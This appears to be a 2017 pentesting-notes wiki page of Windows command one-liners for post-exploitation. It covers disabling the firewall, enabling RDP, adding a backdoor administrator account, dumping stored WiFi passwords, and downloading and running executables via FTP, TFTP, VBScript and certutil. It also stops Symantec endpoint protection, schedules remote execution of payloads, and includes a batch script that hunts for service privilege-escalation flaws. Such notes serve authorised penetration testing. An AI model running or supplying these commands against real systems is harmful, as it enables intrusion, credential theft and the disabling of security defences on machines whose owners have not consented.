From BHaFSec Pentesting Notes Wiki
Revision as of 04:26, 21 July 2017 by Illwill (talk | contribs)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search


netsh advfirewall show state
netsh advfirewall show config
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Exploit" dir=in action=allow program="C:\exploit.exe" enable=yes
netsh firewall add portopening tcp 2482 lt enable all


schtasks /query /fo LIST /v
tasklist /SVC
sc qc Spooler

Enable RDP

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Add Admin User

net user [username] [password] /add
net localgroup administrators [username] /add

( C:\WINNT\System32>net user GOD 0wned /add )
( C:\WINNT\System32>net localgroup administrators GOD /add )

Dump WIFI passwords to .xml

netsh wlan export profile key=clear

Dump WIFI SSID/Password oneliner

@echo off & for /f "tokens=1*delims=:" %a in ('netsh wlan show profiles') do (for /f "tokens=*" %c in ("%~b") do netsh wlan show profile name=%c key=clear) | findstr   /c:"Key Content" /c:"SSID name"

OS Name and Version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Transfer File from FTP

echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp

Transfer File from TFTP

tftp -i get yourfile.exe && start yourfile.exe

Transfer File from ADODB STREAM FILES

echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs

re-enable ADODB stream if patched

echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg

WebDL using CertUtil

certutil -urlcache -split -f && start yourfile.exe

Mount Windows Share with Null Session

net use x: \\server\share "" /u:

Disable Symantec Endpoint Protection

c:\program files\symantec\symantec endpoint protection\smc -stop

AT Command Execution

at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"


schtasks /create /tn rb /tr "c:\EVIL.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""

Run external Windows Script Component (pops calc.exe)

regsvr32 /s /n /u /i: scrobj.dll

Run Sysinternals programs

pushd \\ && autoruns /accepteula && pause && popd

Find unquoted service paths without access to wmic. Need to run both of these to catch services with spaces in their names:

for /f "tokens=2" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc %i | findstr "BINARY_PATH_NAME" >> output.txt
for /f "tokens=2*" %i in ('sc query ^|findstr "SERVICE_NAME"') do sc qc "%i %j" | findstr "BINARY_PATH_NAME" >> output.txt


Check permissions on services

@echo off
REM Batch port of selected modules from PowerUp by harmj0y
REM Author: @_wald0

REM ======================================
REM = Find unquoted service binary paths =
REM ======================================
echo Finding unquoted service binary paths...

for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
    set str=%%i
	set str=!str:~1!
    sc qc "!str!" | findstr "BINARY_PATH_NAME" | findstr /iv "c:\windows\\" | findstr /iv """

REM ========================================================================
REM =                 Check permissions on services                        =
REM =           Technique stolen from PowerUp by harmj0y                   =
REM = =
REM ========================================================================
echo Finding service binaries your user has write access to...

for /f "tokens=2* delims=:" %%i in ('sc query ^|findstr "SERVICE_NAME"') do (
    set str=%%i
	set str=!str:~1!
	for /f "tokens=4" %%e in ('sc qc "!str!" ^| findstr "ERROR_CONTROL"') do (
	    set errCtrl=%%e
		sc config "!str!" error= !errCtrl! > nul && (
		        echo Vulnerable service found: !str!

REM =================================================
REM = Check for write access to directories in PATH =
REM =================================================
echo Finding write access in PATH directories...

for %%A in ("%path:;=";"%") do (
    set filename=%%~A\dll-write-check.txt
	copy /y nul "!filename!" > nul 2>&1 && (
	    del "!filename!"
	    echo Writable path directory found: %%A